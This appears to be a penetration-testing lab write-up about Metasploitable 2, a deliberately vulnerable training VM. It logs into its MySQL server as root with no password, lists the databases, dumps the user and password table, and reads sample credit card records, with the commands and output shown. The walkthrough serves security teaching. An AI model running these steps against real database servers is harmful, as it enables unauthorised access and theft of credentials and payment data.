The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
The Nessus report on this port was very revealing; here is some of the information:
3306/tcpMySQL Unpassworded Account Check
SynopsisThe remote database server can be accessed without a password.
DescriptionIt is possible to connect to the remote MySQL database server using an unpassworded account. This may allow an attacker to launch further attacks against the database.
The ‘root’ account does not have a password.
Here is the list of databases on the remote server :
- information_schema
- dvwa
- metasploit
- mysql
- owasp10
- tikiwiki
- tikiwiki195Version : 5.0.51a-3ubuntu5
Protocol : 10
Server Status : SERVER_STATUS_AUTOCOMMIT
Server Capabilities :
CLIENT_LONG_FLAG (Get all column flags)
CLIENT_CONNECT_WITH_DB (One can specify db on connect)
CLIENT_COMPRESS (Can use compression protocol)
CLIENT_PROTOCOL_41 (New 4.1 protocol)
CLIENT_SSL (Switch to SSL after handshake)
CLIENT_TRANSACTIONS (Client knows about transactions)
CLIENT_SECURE_CONNECTION (New 4.1 authentication)
The ‘root’ account does not have a password! So, let’s see if we can connect to the SQL database with the username root and a blank password.
~# mysql -h 192.168.1.103 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
And there we have the database connection. Let’s have a look at the databases:
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.01 sec)
Let’s choose mysql database and have a look at the tables:
mysql> use mysql Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; +---------------------------+ | Tables_in_mysql | +---------------------------+ | columns_priv | | db | | func | | help_category | | help_keyword | | help_relation | | help_topic | | host | | proc | | procs_priv | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | | user | +---------------------------+ 17 rows in set (0.00 sec)
Let’s have a look at users and their passwords:
mysql> select User, Password from user;
+------------------+----------+
| User | Password |
+------------------+----------+
| debian-sys-maint | |
| root | |
| guest | |
+------------------+----------+
3 rows in set (0.00 sec)
mysql>
So, three users without passwords we can use.
Let’s have a look at tables within another database:
mysql> show tables from owasp10;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts |
| blogs_table |
| captured_data |
| credit_cards |
| hitlog |
| pen_test_tools |
+-------------------+
6 rows in set (0.01 sec)
We’ll change database and have a look at credit card details:
mysql> use owasp10 Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> select * from credit_cards; +------+------------------+------+------------+ | ccid | ccnumber | ccv | expiration | +------+------------------+------+------------+ | 1 | 4444111122223333 | 745 | 2012-03-01 | | 2 | 7746536337776330 | 722 | 2015-04-01 | | 3 | 8242325748474749 | 461 | 2016-03-01 | | 4 | 7725653200487633 | 230 | 2017-06-01 | | 5 | 1234567812345678 | 627 | 2018-11-01 | +------+------------------+------+------------+ 5 rows in set (0.03 sec) mysql>
Hat-Tip to PentestLab for the MYSQL post exploitation.
Below is a SecurityTube video obtaining a root shell via Metasploit: